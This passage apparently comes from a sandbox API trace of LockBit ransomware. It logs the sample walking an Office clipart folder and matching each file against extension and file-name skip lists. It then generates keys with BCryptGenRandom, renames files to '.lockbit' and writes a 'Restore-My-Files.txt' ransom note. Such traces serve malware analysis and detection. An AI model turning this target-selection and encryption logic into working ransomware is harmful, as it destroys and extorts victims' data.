-1 [0112.279] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.279] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.280] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01162_.WMF") returned 1 [0112.280] lstrcmpiW (lpString1="ntldr", lpString2="DD01162_.WMF") returned 1 [0112.280] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01162_.WMF") returned 1 [0112.280] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01162_.WMF") returned -1 [0112.280] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01162_.WMF") returned -1 [0112.280] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01162_.WMF") returned 1 [0112.280] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01162_.WMF") returned 1 [0112.280] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.280] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned=".WMF" [0112.281] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.281] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.281] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.282] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.282] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.282] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.lockbit") returned 72 [0112.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0112.282] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.282] malloc (_Size=0x40068) returned 0x3d70450 [0112.282] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2300) returned 1 [0112.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0112.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0112.284] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0112.288] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.288] malloc (_Size=0xa6) returned 0x77d7a8 [0112.288] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.289] free (_Block=0x77d7a8) [0112.289] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.289] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.289] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.289] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01163_.WMF", cAlternateFileName="")) returned 1 [0112.289] lstrcmpiW (lpString1=".", lpString2="DD01163_.WMF") returned -1 [0112.289] lstrcmpiW (lpString1="..", lpString2="DD01163_.WMF") returned -1 [0112.289] PathFindExtensionW (pszPath="DD01163_.WMF") returned=".WMF" [0112.289] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.289] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.289] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.289] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.290] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.290] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.291] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01163_.WMF") returned 1 [0112.291] lstrcmpiW (lpString1="ntldr", lpString2="DD01163_.WMF") returned 1 [0112.291] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01163_.WMF") returned 1 [0112.291] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01163_.WMF") returned -1 [0112.292] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01163_.WMF") returned -1 [0112.292] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01163_.WMF") returned 1 [0112.292] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01163_.WMF") returned 1 [0112.292] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.292] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned=".WMF" [0112.292] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.292] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.292] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.293] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.293] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.293] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.293] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.293] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.293] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.293] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.293] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.293] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.lockbit") returned 72 [0112.293] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0112.293] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.293] malloc (_Size=0x40068) returned 0x3db04c0 [0112.295] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=2300) returned 1 [0112.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.295] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0112.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0112.296] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0112.307] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.307] malloc (_Size=0xa6) returned 0x77d7a8 [0112.307] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.307] free (_Block=0x77d7a8) [0112.308] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.308] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.308] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01166_.WMF", cAlternateFileName="")) returned 1 [0112.308] lstrcmpiW (lpString1=".", lpString2="DD01166_.WMF") returned -1 [0112.308] lstrcmpiW (lpString1="..", lpString2="DD01166_.WMF") returned -1 [0112.308] PathFindExtensionW (pszPath="DD01166_.WMF") returned=".WMF" [0112.308] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.308] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.309] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.309] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01166_.WMF") returned 1 [0112.310] lstrcmpiW (lpString1="ntldr", lpString2="DD01166_.WMF") returned 1 [0112.310] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01166_.WMF") returned 1 [0112.310] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01166_.WMF") returned -1 [0112.310] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01166_.WMF") returned -1 [0112.310] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01166_.WMF") returned 1 [0112.310] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01166_.WMF") returned 1 [0112.310] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.310] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned=".WMF" [0112.310] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.310] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.311] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.311] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.lockbit") returned 72 [0112.311] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0112.317] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.317] malloc (_Size=0x40068) returned 0x3e70008 [0112.317] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2080) returned 1 [0112.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0112.318] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, 